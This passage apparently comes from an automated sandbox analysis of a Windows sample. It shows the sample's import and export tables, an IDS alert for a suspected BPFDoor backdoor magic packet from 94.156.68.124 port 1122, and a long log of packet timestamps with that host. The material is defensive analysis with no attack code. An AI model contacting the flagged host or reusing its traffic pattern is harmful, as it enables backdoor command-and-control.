DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateICW, CreateHalftonePalette, CreateFontIndirectW, CreateFontW, CreateDIBitmap, CreateDIBSection, CreateDCW, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileW, CombineRgn, Chord, BitBlt, ArcTo, Arc, AngleArc, AbortDoc |
| version.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW |
| kernel32.dll | lstrlenW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, VerSetConditionMask, VerifyVersionInfoW, TryEnterCriticalSection, SwitchToThread, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryW, ReadFile, RaiseException, QueryPerformanceFrequency, QueryPerformanceCounter, IsDebuggerPresent, OutputDebugStringW, MultiByteToWideChar, MulDiv, LockResource, LocalFree, LoadResource, LoadLibraryW, LeaveCriticalSection, LCMapStringW, IsValidLocale, InitializeCriticalSection, HeapSize, HeapFree, HeapDestroy, HeapCreate, HeapAlloc, GlobalUnlock, GlobalSize, GlobalLock, GlobalFree, GlobalFindAtomW, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomW, GetVersionExW, GetVersion, GetUserDefaultLCID, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathW, GetSystemDirectoryW, GetStdHandle, GetLongPathNameW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileAttributesW, GetExitCodeThread, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCPInfoExW, GetCPInfo, GetACP, FreeResource, FreeLibrary, FormatMessageW, FindResourceW, FindFirstFileW, FindClose, ExpandEnvironmentStringsW, EnumSystemLocalesW, EnumResourceNamesW, EnumCalendarInfoW, EnterCriticalSection, DeleteFileW, DeleteCriticalSection, CreateThread, CreateFileW, CreateEventW, CompareStringA, CompareStringW, CloseHandle |
| advapi32.dll | RegUnLoadKeyW, RegSetValueExW, RegSaveKeyW, RegRestoreKeyW, RegReplaceKeyW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegLoadKeyW, RegFlushKey, RegEnumValueW, RegEnumKeyW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegConnectRegistryW, RegCloseKey |
| kernel32.dll | Sleep |
| oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit |
| oleaut32.dll | GetErrorInfo, SysFreeString |
| ole32.dll | CreateStreamOnHGlobal, ReleaseStgMedium, OleDraw, DoDragDrop, RevokeDragDrop, RegisterDragDrop, OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID |
| comctl32.dll | InitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_GetImageInfo, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Copy, ImageList_LoadImageW, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Replace, ImageList_Draw, ImageList_SetOverlayImage, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create |
| user32.dll | EnumDisplayMonitors, GetMonitorInfoW, MonitorFromPoint, MonitorFromRect, MonitorFromWindow |
| msvcrt.dll | isxdigit, isupper, isspace, ispunct, isprint, islower, isgraph, isdigit, iscntrl, isalpha, isalnum, toupper, tolower, strchr, strncmp, memset, memcpy, memcmp |
| shell32.dll | ShellExecuteW, Shell_NotifyIconW, DragQueryFileW |
| comdlg32.dll | PageSetupDlgW, PrintDlgW, GetSaveFileNameW, GetOpenFileNameW |
| winspool.drv | SetPrinterW, OpenPrinterW, GetPrinterW, GetDefaultPrinterW, EnumPrintersW, DocumentPropertiesW, DeviceCapabilitiesW, ClosePrinter |
| winspool.drv | GetDefaultPrinterW |
| winmm.dll | timeGetTime |
| d3d9.dll | Direct3DCreate9 |

| Name | Ordinal | Address |
|---|---|---|
| TMethodImplementationIntercept | 3 | 0x4a3e00 |
| __dbk_fcall_wrapper | 2 | 0x417dd0 |
| dbkFCallWrapperAddr | 1 | 0xd72f58 |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-25T01:11:15.400506+0200 | 2036752 | ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound) | 1 | 94.156.68.124 | 1122 | 192.168.2.7 | 49700 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                  Sep 25, 2024 01:11:09.964638948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964643002 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964652061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964675903 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.964848042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.964889050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.965282917 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965354919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965365887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965394020 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:09.965501070 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965512991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:09.965537071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.009076118 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.048923016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.048953056 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.048964977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049010038 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049156904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049169064 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049182892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049194098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049204111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049206972 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049221039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049247980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049447060 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.049496889 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.049499035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.069067955 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.073843002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.073898077 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.079624891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.111020088 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.115880013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.115938902 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.120829105 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.232408047 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.237251043 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.237301111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.242645025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581315041 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581677914 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581692934 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581706047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581748962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581799984 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581841946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581855059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581867933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581907034 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.581926107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.581964970 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582026958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582048893 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582084894 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582185984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582199097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582233906 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582329035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582344055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582376003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582449913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582499027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582509995 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582532883 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582704067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582736969 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582745075 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582747936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582781076 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.582952976 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582978010 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.582988977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583010912 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.583065033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583110094 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.583201885 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583214045 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.583257914 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660351038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660387993 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660398006 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660410881 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660486937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660500050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660574913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660600901 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660655975 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660711050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660744905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660758018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660768032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660821915 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.660983086 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.660995007 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661021948 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661039114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661092043 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661160946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661174059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661206007 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661308050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661320925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661333084 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661344051 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661355019 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661380053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661547899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661650896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661663055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661685944 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661755085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661792994 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.661865950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661940098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661952019 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.661983013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662130117 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662142038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662154913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662168026 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662169933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662198067 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662364006 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662408113 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662472963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662484884 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662497997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662520885 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662791967 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662831068 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.662842035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662853956 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.662897110 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668432951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668466091 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668478966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668509960 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668622017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668634892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668648958 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668659925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668662071 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668699980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668868065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.668909073 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.668919086 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669001102 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669013023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669023991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.669049025 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.669071913 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781631947 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781651020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781663895 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781704903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781717062 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781729937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781729937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781743050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781774044 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.781935930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781980038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.781982899 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782037973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782074928 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782150984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782164097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782176971 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782193899 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782270908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782310009 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782346964 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782360077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782403946 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782538891 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782551050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782562017 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782586098 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782669067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782704115 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782753944 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782766104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782812119 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.782967091 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782978058 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.782989025 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783001900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783020973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783041954 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783204079 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783266068 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783277035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783288956 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783308029 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783476114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783502102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783567905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783581018 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783605099 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783719063 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783730984 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783756971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.783803940 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783814907 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.783842087 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785044909 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785093069 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785125971 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785142899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785156012 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785180092 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785197973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785235882 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785331964 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785345078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785356045 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785377026 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785464048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785501003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785557032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785665989 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785676956 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785689116 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785701036 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785725117 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785895109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785907030 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785918951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785928965 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.785943985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.785969019 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.786545038 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786619902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786632061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786662102 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.786686897 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786720991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.786758900 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786771059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786808014 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.786901951 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786914110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786926031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786937952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.786948919 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.786982059 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787134886 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787242889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787252903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787264109 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787275076 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787281036 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787286997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787298918 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787307024 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787328959 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787619114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787667990 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787673950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787687063 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787722111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:10.787817955 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787830114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:10.787842035 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005235910 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005284071 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005294085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005333900 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:11.005403042 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005414963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005425930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:11.005455971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:11.005465984 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:11.005578041 CEST11224970094.156.68.124192.168.2.7
